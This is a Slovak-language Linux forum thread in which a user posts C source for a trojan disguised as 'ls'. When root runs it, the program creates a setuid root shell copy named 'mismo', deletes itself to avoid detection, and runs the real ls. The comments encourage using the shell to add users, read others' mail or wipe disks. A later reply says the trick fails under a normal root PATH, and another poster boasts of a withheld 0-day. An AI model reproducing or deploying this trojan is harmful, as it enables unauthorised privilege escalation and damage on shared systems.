Hello....co tak nieco hacknut????????
Podte nieco hacknut...:-))))
I love Linux and I hate Windows..:-))
ICQ: 465-752-783
O Linuxe
Portál
Odporúčame
Podporte nás
Ak sa vám táto stránka páči, môžete nás podporiť tak, že si na vaše stránky umiestnite tento banner.
Náš Twitter tag je #LinuxOSsk
void
main(void)
{
seteuid(0); /* Bez toho by tento program mal len prava obycajneho usera. */
setegid(0); /* 1. riadok meni vlastnika na roota, tento riadok skupinu. */
/* Po tomto prikaze teda program moze vsetko ( ak ho spustil
root ). */
system("/bin/cp /bin/sh mismo"); /* (3) */
system("/bin/chmod 6755 mismo"); /* (4) */
system("/bin/rm -r ls"); /* (5) */
system("/bin/ls"); /* (6) */
}
/*
Tento zdrojak ( ak sa vola ls.c ) prekompiluj prikazom make ls a vznikne vykonatelny subor ls ( ak vznikol a.out, premenuj ho na ls ).
Nesmies mat u seba subor s nazvom mismo ! Inak sa nemusi podarit jeho vytvorenie ( odskusane ).
Ked teda root bude prezerat tvoj adresar a napise ls, spusti namiesto
programu /bin/ls tento program ls samozrejme v tvojom podadresari a ten
najprv skopiruje shell do suboru mismo, (3)
potom mu zmeni atributy na prepozicanie prav, (4)
potom sa sam zmaze (5)
a potom spusti "pravy" prikaz /bin/ls (6).
Odteraz ked napises mismo, budes mat prava roota. Mozes pridavat
pouzivatelov, citat cudziu postu, alebo aj
preformatovat disk ( moja najoblubenejsia cinnost ).
Mimochodom - ls je nutne zmazat, inak by si sa hned odhalil
( v tom programe to robi bod (5) )
....bratu pochopil????
stanley@debian:~$ cd Desktop
stanley@debian:~/Desktop$ cd skripty
stanley@debian:~/Desktop/skripty$ ./mismo
mismo-3.1$
...staci ako dokaz???
mne to neslo ani skomplikovat, pisalo mi to nieco ako neexistuje Makefile.
MOSSAD
tu je par slov o tom
make lspriklad skompiluje. Vid: Ten void mi tam skoro vytrhol oci. Prosim, piste to poriadne :) Ako staremu C-ckarovi sa mi pri takychto veciach dviha zaludok.Posledna vec je fakt, ze toto nefunguje. Preco? Ked r00t napise prikaz "ls" v tom adresari, tak sa zial opat zavola prikaz /bin/ls. To by tam musel totiz napisat prikaz "./ls", co asi nikto nikdy nespravi. Nabuduce by to mohol mily uid0 rovno napisat a neposielat ludi do /dev/n00b. Vdaka a pekny zvysok dna.
Inak, rozmyslal som, ze pridam do diskusie zdrojak 0-day remote root exploitu na najnovsi kernel (a vsetky starsie) a sluzbu openssh, ale kedze niektori v diskusii sa spravali tak ako sa spravali, tak si to radsej necham pre seba :)